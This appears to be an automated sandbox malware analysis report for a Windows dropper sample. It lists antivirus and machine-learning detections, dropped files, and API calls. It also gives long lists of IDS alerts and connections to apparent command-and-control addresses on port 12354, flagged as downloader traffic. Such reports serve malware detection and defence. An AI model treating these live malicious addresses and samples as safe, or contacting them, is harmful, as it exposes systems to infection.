2024-12-11T16:28:19.790955+010028032702Potentially Bad Traffic192.168.2.458942107.163.241.23212354TCP
2024-12-11T16:28:19.790994+010028032702Potentially Bad Traffic192.168.2.458949107.163.241.23212354TCP
2024-12-11T16:28:22.019711+010028032702Potentially Bad Traffic192.168.2.459852107.163.241.23212354TCP
2024-12-11T16:28:22.145302+010028032702Potentially Bad Traffic192.168.2.460003107.163.241.23212354TCP
2024-12-11T16:28:23.802406+010028032702Potentially Bad Traffic192.168.2.460904107.163.241.23212354TCP
2024-12-11T16:28:23.802453+010028032702Potentially Bad Traffic192.168.2.460937107.163.241.23212354TCP
2024-12-11T16:28:26.316611+010028032702Potentially Bad Traffic192.168.2.462256107.163.241.23212354TCP
2024-12-11T16:28:26.324477+010028032702Potentially Bad Traffic192.168.2.462272107.163.241.23212354TCP
2024-12-11T16:28:27.816638+010028032702Potentially Bad Traffic192.168.2.465425107.163.241.23212354TCP
2024-12-11T16:28:27.816774+010028032702Potentially Bad Traffic192.168.2.465168107.163.241.23212354TCP
2024-12-11T16:28:30.066400+010028032702Potentially Bad Traffic192.168.2.465528107.163.241.23212354TCP
2024-12-11T16:28:30.404748+010028032702Potentially Bad Traffic192.168.2.465533107.163.241.23212354TCP
2024-12-11T16:28:32.331816+010028032702Potentially Bad Traffic192.168.2.449186107.163.241.23212354TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: otsIBG7J9b.exeAvira: detected
Antivirus detection for dropped file
Source: C:\ufcpp.exeAvira: detection malicious, Label: TR/Dropper.Gen
Multi AV Scanner detection for dropped file
Source: C:\agtve\yhnvs.dllReversingLabs: Detection: 92%
Multi AV Scanner detection for submitted file
Source: otsIBG7J9b.exeReversingLabs: Detection: 86%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\ufcpp.exeJoe Sandbox ML: detected
Source: C:\agtve\yhnvs.dllJoe Sandbox ML: detected
Machine Learning detection for sample
Source: otsIBG7J9b.exeJoe Sandbox ML: detected
Source: otsIBG7J9b.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\rundll32.exeFile created: c:\agtve\ReadMe.txtJump to behavior
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:49854 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:49927 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:50314 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:50813 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:51630 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:55345 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:63751 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:50549 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:52511 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:59533 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:61399 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:52279 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:54480 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:57279 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:60439 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:63924 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:52665 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:56120 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:58943 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:60788 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:64219 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:50153 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:53009 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:56323 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:58388 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:61601 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:63849 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:50458 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:52420 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:55203 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:58772 version: TLS 1.2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000B0A0 lstrcpy,lstrcat,lstrcat,lstrcat,FindFirstFileA,FindNextFileA,rand,lstrcpy,lstrcat,lstrcat,_strcmpi,GetTickCount,srand,rand,rand,rand,rand,rand,rand,rand,rand,wsprintfA,wsprintfA,Sleep,wsprintfA,Sleep,strchr,strchr,strchr,strchr,atoi,DeleteFileA,Sleep,lstrcat,FindNextFileA,FindClose,5_2_1000B0A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_100052A0 FindFirstFileA,wsprintfA,wsprintfA,FindNextFileA,FindClose,5_2_100052A0
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

Networking

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 202.108.0.52 80Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.241.232 12354Jump to behavior
Connects to many ports of the same IP (likely port scanning)
Source: global trafficTCP traffic: 107.163.241.232 ports 1,2,3,4,5,12354
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50086 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50192 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50226 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50243 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50267 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50270 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50295 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50298 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50321 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50324 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50356 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50359 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50389 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50392 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50423 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50429 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50467 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50470 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50500 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50502 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50557 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50563 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50618 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50622 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50687 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50692 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50748 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50753 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50835 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50837 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50912 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50919 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51045 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51050 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51141 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51148 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51278 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51284 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51378 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51386 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51468 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51478 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51568 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51577 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51658 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51666 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51739 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51741 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52288 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52374 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53686 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53818 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 55654 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 55673 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56252 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56358 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57170 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57220 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58813 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58979 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60535 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60620 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62221 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62240 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64094 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64295 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49297 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49302 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51032 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51043 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51600 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51644 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52531 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52742 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 54225 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 54301 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56134 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56227 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57709 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57840 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59956 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59963 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60164 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60300 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 61430 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 61535 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 63248 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 63325 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 65122 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 65178 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50596 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50672 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52408 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52411 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53875 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53961 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 54837 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 54958 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 55703 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 55711 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57677 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58094 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59142 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59184 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60763 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60899 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62496 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62586 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64241 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64312 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 65063 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 65171 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50909 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50940 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52883 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53079 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 54632 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 54647 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56499 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56578 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57853 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57918 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59080 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59082 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60079 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60227 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 61240 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 61332 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62610 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62613 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64462 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64627 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49506 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49593 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50611 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50767 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51437 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51444 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53248 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53345 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 54800 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 54887 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56382 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56402 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57106 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57159 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58391 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58418 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59860 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59960 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62038 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62150 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 63631 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 63702 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64439 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64580 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 65394 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 65425 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50784 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50786 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51537 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51675 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52558 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52693 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53852 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53858 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 55592 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 55780 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57024 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57172 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58942 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58949 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59852 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60003 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60904 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60937 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62256 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62272 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64270 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64406 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64546 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64711 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64868 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64990 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 65101 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 65168 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 65253 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 65425 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 65528 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 65533 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49186 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49188 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49191 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49353 -> 12354
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 107.163.241.232:12354
Source: Joe Sandbox ViewIP Address: 202.108.0.52 202.108.0.52
Source: Joe Sandbox ViewASN Name: TAKE2US TAKE2US
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49780 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49754 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49805 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49771 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49790 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49826 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49823 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49808 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49753 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49788 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49807 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49845 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49861 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49844 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49947 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49860 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49932 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50064 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49876 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50131 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50086 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50027 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49842 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49910 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50147 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50008 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49895 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49985 -> 107.163.241.232:12354
